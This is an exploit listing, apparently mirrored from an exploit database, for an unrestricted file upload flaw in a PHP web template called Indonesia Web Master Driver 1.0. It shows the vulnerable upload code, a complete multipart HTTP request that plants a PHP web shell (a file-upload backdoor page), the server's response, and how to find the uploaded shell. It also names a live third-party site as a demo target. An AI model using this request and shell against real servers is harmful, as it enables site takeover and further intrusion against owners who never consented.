Indonesia Web Master Driver 1.0 - Shell Upload
CVE
Category
Price
Severity
N/A
CWE-434
$500
High
Author
Risk
Exploitation Type
Date
Unknown
High
Remote
2022-10-12
CVSS vector description
Metric
Value
Metric Description
Value Description
Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2022100031 Below is a copy:
Indonesia Web Master Driver 1.0 - Shell Upload # Exploit Title: Indonesia Web Master Driver 1.0 - Shell Upload
# Date: 10-10-2022
# Exploit Author: X-DEX
# Vendor Homepage:
https://themeforest.net/user/webmasterdriver
# Version: v1.0
# Tested on: Kali Linux
----- POC -----
Note : vulnerability at http://localhost/registact.php
"
$image1=$_FILES["img1"]["name"];
$image2=$_FILES["img2"]["name"];
$newimg1 = date('dmYHis').$image1;
$newimg2 = date('dmYHis').$image2;
move_uploaded_file($_FILES["img1"]["tmp_name"],"image/id/".$newimg1);
move_uploaded_file($_FILES["img2"]["tmp_name"],"image/id/".$newimg2);
"
---------------
Request : URL - http://localhost/registact.php
===============
use burpsuite
POST /registact.php HTTP/1.1
Host: http://localhost
Content-Length: 1007
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: null
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryLBXMHTxHs8OmgM8w
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close
------WebKitFormBoundaryLBXMHTxHs8OmgM8w
Content-Disposition: form-data; name="MAX_FILE_SIZE"
512000
------WebKitFormBoundaryLBXMHTxHs8OmgM8w
Content-Disposition: form-data; name="img1"; filename="m.php"
Content-Type: application/x-php
<?php
echo "<body bgcolor=black>";
echo "<p><div align=center><font color=#ff9933 font size=6> <3 INDI</font><font color=white font size=6>SHELL</font><font color=green font size=6>=FTW <3 </font><p><form method=post enctype=multipart/form-data name=uploader >";
echo "<input type=file name=file size=50>    <input type=submit name=sut value=Upload></form>";
if( isset($_POST['sut']) )
{
if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name']))
{
echo "<font color=red size=2 face=\"comic sans ms\">upload done :D<br><br>";
}
else {
echo "<font color=red size=2 face=\"comic sans ms\">Upload failed :P<br>";
}
}
?>
------WebKitFormBoundaryLBXMHTxHs8OmgM8w--
Response
HTTP/1.1 200 OK
Connection: close
x-powered-by: localhost
set-cookie: PHPSESSID=164455c4fc628fc476d48023c0f44e2e; path=/
expires: Thu, 19 Nov 1981 08:52:00 GMT
cache-control: no-store, no-cache, must-revalidate
pragma: no-cache
content-type: text/html; charset=UTF-8
Content-Length: 153
vary: Accept-Encoding,User-Agent
date: Tue, 11 Oct 2022 02:21:20 GMT
server: LiteSpeed
x-xss-protection: 1; mode=block
x-content-type-options: nosniff
<script>alert('Email sudah terdaftar, silahkan gunakan email lain!');</script><script type='text/javascript'> document.location = 'regist.php'; </script>
shell access = http://localhost/image/id/date('dmYHis')m.php
date('dmYHis') use your brain hihihihi
Demo site : https://panjitrans.net/registact.php
Copyright ©2024 Exploitalert.
This information is provided for TESTING and LEGAL RESEARCH purposes only. All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum